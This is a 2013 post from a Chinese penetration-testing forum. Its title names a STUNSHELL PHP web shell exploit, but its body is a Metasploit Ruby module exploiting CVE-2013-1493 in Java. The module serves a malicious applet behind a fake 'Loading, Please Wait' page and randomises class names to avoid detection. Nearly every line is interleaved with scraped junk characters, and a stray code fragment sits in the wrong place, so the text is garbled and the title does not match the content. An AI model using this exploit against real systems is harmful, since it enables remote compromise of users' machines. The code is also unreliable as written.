中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
/ X0 e0 h2 `- x& v! z! ^require ‘msf/core’
* X, [6 e( Y, J# O; |! R& p) srequire ‘rex’
/ V. s# D0 p$ Fclass Metasploit3 < Msf::Exploit::Remote
6 E  b0 L3 M' l/ ]/ g* sRank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
: G7 R& H# \8 F$ z. M" x4 J5 Sautopwn_info({ :javascript => false })
def initialize( info = {} )
3 Q: C- s6 Z' ~( ~+ q: Dsuper( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
. s% s) H; J  W‘Description’ => %q{
  u( P  B! B, ~" b$ X7 DThis module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
$ m. v" B) v1 r8 n2 Jand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
2 B. [" E/ N8 T2 Mand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, m! G" K& H, _# s1 W/ z& fsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
/ A! X. q3 j: h. awarning in order to run the malicious applet.
0 j& Y" t1 W  j},
‘License’ => MSF_LICENSE,
4 T1 V6 G( Z* v2 K$ l8 B+ k* H7 {‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
8 o0 V# g3 v; U* f! b'juan vazquez' # Metasploit module (just ported the published exploit)
],
' Q1 H9 C4 ~* e  B, Z  _‘References’ =>
  z  A6 F9 a7 Y# g, M+ F( N, y[
[ 'CVE', '2013-1493' ],
+ C6 t6 z+ O5 ^8 x+ Q' `* w[ 'OSVDB', '90737' ],
3 O. t" Q9 h* P+ M6 x& f[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
5 F& b9 {4 n3 K% C& S[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
/ v1 v  D! e3 f! I1 N‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
2 w9 i- s3 F. L) Y9 `6 _& \[
[ 'Generic (Java Payload)',
1 v& h2 q$ `' l( w# V* w% e{
% F. K  V) E7 o'Platform' => 'java',
  Z, Y2 d! y4 E* ]* N% h! F2 h/ A'Arch' => ARCH_JAVA
}
& ]; Q5 b: G4 e& _$ J],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
- |8 x" y9 r; R% T. U( P" E6 v/ T‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
8 \9 H# H* O( \% \def setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
+ Q/ l! O# _% k@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 n( k2 e4 K. Q, C4 Q. spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% ^1 v' B3 N) D' p% y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
) X1 J/ T: k; m. A+ R0 i@init_class.gsub!(“Init”, @init_class_name)
super
3 Q8 t% ~: _5 F6 O9 n" ~! Nend
def on_request_uri(cli, request)
, v+ p+ H+ n3 oprint_status(“handling request for #{request.uri}”)
' _7 S2 q7 Y0 x; Kcase request.uri
( R* C4 C3 f$ X; }+ @1 \) Iwhen /\.jar$/i
- v! i! M+ O/ e/ a8 D% A1 d9 O5 B+ Mjar = payload.encoded_jar
# r% L% A9 J# _/ Djar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
( Q9 ^8 @* ?* z$ L6 W3 z, J" Njar.add_file(“MyColorSpace.class”, @color_space_class)
- ?" y+ t8 p1 VDefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
6 I2 K2 \5 k5 [1 f' u) Gpayload_str = rand_text_alpha(“payload”.length)
5 ?6 |  v. t3 M% u* B! B' a9 ]jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
) T2 v% h+ @3 t, zentry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
' S5 Z- L, B4 J8 y6 x8 q" ?jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
- Q; z0 [6 c1 a  cpayload = regenerate_payload(cli)
7 s  s! [7 r. \! dif not payload
" L* q% X0 T2 _9 Nprint_error(“Failed to generate the payload.”)
send_not_found(cli)
return
& o  Y2 B7 P, x* ~- p. [end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
) d( y' j0 x+ }7 S- U3 telse
send_redirect(cli, get_resource() + ‘/’, ”)
# Q0 g( G6 g. P7 ~4 B- uend
end
$ g) M' W, ^4 G4 {  g" Kdef generate_html
0 Y1 l9 \( _/ l0 U8 P6 Zhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
( [  R' w% ?! v0 m5 c- S$ N9 ereturn html
end
2 A! ?+ ^5 V, V3 U) L( \end
end

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2